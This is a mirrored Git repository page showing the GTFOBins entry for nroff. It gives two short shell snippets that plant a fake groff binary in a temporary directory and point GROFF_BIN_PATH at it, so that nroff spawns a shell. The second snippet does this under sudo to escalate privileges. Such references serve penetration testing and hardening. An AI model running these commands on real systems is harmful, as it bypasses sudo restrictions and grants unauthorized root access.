This website requires JavaScript.
Explore
Help
Register
Sign In
mirror
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced
2026-01-04 06:41:39 +01:00
Code
Issues
9ec96219a3
GTFOBins.github.io
/
_gtfobins
/
nroff.md
bcoles
2eadcc4082
Create nroff.md
2020-03-17 19:38:41 +01:00
386 B
Raw
Blame
History
functions
shell
sudo
code
TF=$(mktemp -d) echo '#!/bin/sh' > $TF/groff echo '/bin/sh' >> $TF/groff chmod +x $TF/groff GROFF_BIN_PATH=$TF nroff
code
TF=$(mktemp -d) echo '#!/bin/sh' > $TF/groff echo '/bin/sh' >> $TF/groff chmod +x $TF/groff sudo -E GROFF_BIN_PATH=$TF nroff